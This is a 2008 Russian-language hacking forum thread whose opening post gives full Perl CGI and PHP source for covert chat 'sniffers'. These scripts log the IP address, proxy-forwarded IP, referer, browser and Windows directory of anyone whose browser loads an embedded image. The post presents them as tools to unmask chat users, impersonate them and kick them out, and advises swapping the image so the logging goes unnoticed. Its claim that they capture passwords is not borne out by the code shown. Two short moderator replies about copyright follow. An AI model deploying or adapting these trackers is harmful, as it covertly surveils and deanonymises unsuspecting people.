Перейти к содержимому

Фотография

Снифер изнутри

- - - - -

  • Авторизуйтесь для ответа в теме

#1
DJ FOTON

Отправлено 26 ���� 2008 - 04:55

DJ FOTON

    Начинающий

  • Пользователи
  • 69 сообщений
Вы наверное не раз уже пользовались известным снифером Хакзоны, который помогает получить из чата поддерживающего вставку HTML тегов много интересного о пользователях находящихся на канале чата, например IP адреса участников и их ID и пароли, что позволяет тварить в чате "чудеса на виражах", писать от чужих ников, или используя крутую "нюколку" выкинуть наглого пользователя из чата. Наверно вам интересно как написан такой снифер и как он работает, именно этому и посвящена данная статья.
Принцип работы снифера базируется на получении данных которые каждый раз передаёт серверу браузер. Вот исходный код известного снифера Хакзоны:
#!/usr/bin/perl //прописываем путь до Perl,
$log = "/path/to/snifflog.txt"; // прописываем путь где будет вестись лог,

$now_string = localtime; //обьявляем глобальную функцию времени,
@thetime = split(/ +/,$now_string);
@theclock = split(/:/,$thetime[3]);
$ampm = 'am';
if ($theclock[0] > 11)
{ $ampm = 'pm'; }
if ($theclock[0] == 0)
{ $theclock[0] = 12; }
if ($theclock[0] > 12)
{ $theclock[0] -= 12; }
else
{ $theclock[0] += 0; }

$lnum=$ENV{'QUERY_STRING'}; // получение от браузера IP адреса
open (DB, "$log") || die "Can't Open $log: $!\n"; //открываем лог на запись
flock(DB, 2);
@line=<DB>;
flock(DB, 8);
close(DB);
$value = $ENV{'HTTP_REFERER'}; // Получаем путь где исполнился снифер
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

$line0="[$thetime[0] $theclock[0]\:$theclock[1]$ampm] (".$lnum.") ". $ENV{'REMOTE_ADDR'}." ".$ENV{'REMOTE_HOST'}." ".$ENV{'HTTP_X_FORWARDED_FOR'}." [".$value."]";

$maxline=@line;
$maxline=30 if ($maxline>30); // делаем в логе 30 записей

open (DB, ">$log") || die "Can't Open $log: $!\n"; // открываем лог на запись и пишем в него полученные данные
flock(DB, 2);
print DB ("$line0\n");
for ($i=0; $i<$maxline; $i++)
{
print DB ("$line[$i]");
}
flock(DB, 8);
close(DB);

print "Location: [url="http://www.shram.kiev.ua/click?http://www.hackzone.ru/images/hz_animated.gif\n\n";"]http://www.hackzone.ru/images/hz_animated....n\n";[/url]

// показываем в чате или там где установлен снифер картинку. Так как картинка Хакзоны многим извесна в чате, вы можете разместить данный снифер на своём хостинге где разрешают запускать cgi скрипты. Измените путь до картинки которую показывает снифер на путь до своей картинки, и в чате или в другом месте уже не заподозрят, что вы запустили снифер.
Данный снифер запускается только на тех серверах, где не запрещено использовать функцию Whols.
Так так большинство хостингов отказывается от исполнения cgi скриптов из-за соображений собственной безопасности, давайте рассмотрим код снифера написанный на языке РНР. Единственный недостаток данного скрипта - он перехватывает данные только от операционных систем Windows 95/98. Данный код представлен только для познавательных целей, если вы хотите использовать более продвинутый снифер, вам будет несложно добавить в него строки кода для выполнений именно тех функций, которые вы хотите.
<html>
<head>
<title>Команда Enclave</title>
<META http-equiv="Content-Type" content="text/html charset=windows-1251">
<META content="Команда Enclave - RULEZZ forever!!!." name=description>
<META content="Great Lesh, Enclave" name=KEYWORDS>
<!- самый главный php-код -->
<? // говорим что это РНР скрипт
//Объявляем переменные даты, и переменные окружения
$date=date("[D|d/m/Y|H:i]");
$ip=getenv("Remote_addr");
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$uid=implode($argv," ");
//Открытие файла лога и запись в него данных, закрытие лога
$fp=fopen("log.txt","a");
fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n");
fclose($fp);
//-------
//Печатаем рисунок
print (" <img src='http://field.h1.ru/snif/snif.gif'> ");
?>// говорим что РНР скрип закончился
</head>
</html>
Отличие этого снифера в том, что он узнаёт реальный IP адрес если даже человек пользуется прокси сервером. Так же позволяет узнать его операционную систему и в какой каталог проинсталирована Windows. Изучите более детально эти два кода и вы сможете написать свой собственный снифер с исполнением собственных функций.

#2
+s.p.a.m.+

Отправлено 26 ���� 2008 - 07:55

+s.p.a.m.+

    Личный хакер форума=)

  • Banned
  • 228 сообщений
В подфоруме СТАТЬИ пишем только свои статьи и незабываем про копирайты Статьи взятые с других форумов и к которым будут присвоены чюжие копирайты будут удаленны а автор наказан..

#3
+s.p.a.m.+

Отправлено 26 ���� 2008 - 07:58

+s.p.a.m.+

    Личный хакер форума=)

  • Banned
  • 228 сообщений
В подфоруме СТАТЬИ пишем только свои статьи и незабываем про копирайты Статьи взятые с других форумов и к которым будут присвоены чюжие копирайты будут удаленны а автор наказан..